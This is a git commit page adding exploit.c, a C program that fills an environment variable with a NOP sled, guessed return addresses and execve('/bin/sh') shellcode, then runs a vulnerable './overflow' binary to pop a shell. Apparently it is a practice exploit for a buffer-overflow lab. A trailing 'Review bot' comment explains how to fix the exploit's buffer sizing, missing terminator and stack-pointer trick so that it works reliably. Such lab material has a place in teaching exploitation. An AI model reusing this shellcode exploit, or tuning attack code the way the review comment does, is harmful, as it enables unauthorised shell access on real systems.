author | dev0 <matzeton@googlemail.com> | 2012-01-30 16:10:35 +0100 |
---|---|---|
committer | dev0 <matzeton@googlemail.com> | 2012-01-30 16:10:35 +0100 |
commit | 8d64f054048f6402dedbaef11ea5d0f7bd8d530f (patch) | |
tree | 87595d67270dc83ac4781a3815a743ded628b183 /exploit.c |
first commit
Diffstat (limited to 'exploit.c')
-rw-r--r-- | exploit.c | 51 |
1 files changed, 51 insertions, 0 deletions
diff --git a/exploit.c b/exploit.c
new file mode 100644
index 0000000..3137c91
--- /dev/null
+++ b/exploit.c
@@ -0,0 +1,51 @@
+/*
+ * main.c
+ *
+ * Created on: 27.01.2012
+ * Author: druid
+ */
+
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <string.h>
+
+#define PATH_CT "./overflow"
+#define ENV_VAR "EXPLOIT"
+#define NOP 0x90
+
+
+static char shellcode[]=
+"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
+"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
+
+u_long
+esp()
+{
+ __asm__("movl %esp, %eax");
+}
+
+int
+main()
+{
+
+ u_char buf[1032];
+ u_long addr;
+ int i;
+
+ strcpy(buf, "/usr/bin/pico; ");
+
+ addr = esp() - 192;
+ for (i = 16; i < 128 + 16; i += 4)
+ *((u_long *) (buf + i)) = addr;
+ for (i = 128 + 16; i < 1040; i++)
+ buf[i] = 0x90;
+ for (i = 0; i < strlen(shellcode); i++)
+ buf[1040 + i] = shellcode[i];
+ buf[1040 + i] = '\n';
+
+ setenv(ENV_VAR, buf, 1);
+ execl(PATH_CT, "overflow", (char *) 0);
+} |
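Review bot: `u_char buf[1032]` is too small for the payload main() builds into it: the NOP loop writes up to index 1039 and the shellcode plus the trailing '\n' land at buf[1040 .. 1040+strlen(shellcode)], so the exploit overruns its own stack frame before it ever reaches the target, and no terminating NUL is ever stored, so setenv() copies whatever follows the array until it happens to hit a zero byte. Sizing the array from the layout and terminating it fixes both: `u_char buf[1040 + sizeof shellcode + 1];` and, right after the newline store, `buf[1041 + i] = '\0';`. The `NOP` macro defined at the top is never used — the second loop stores the literal `0x90` — so `buf[i] = NOP;` would keep the two in step. Separately, `esp()` has no return statement and only yields the stack pointer because the inline asm happens to leave it in %eax on 32-bit x86 without optimisation; that is undefined behaviour in C, and a comment such as `/* 32-bit x86 only; relies on %eax holding the return value, build with -O0 */` or an explicit output operand would make the dependency visible.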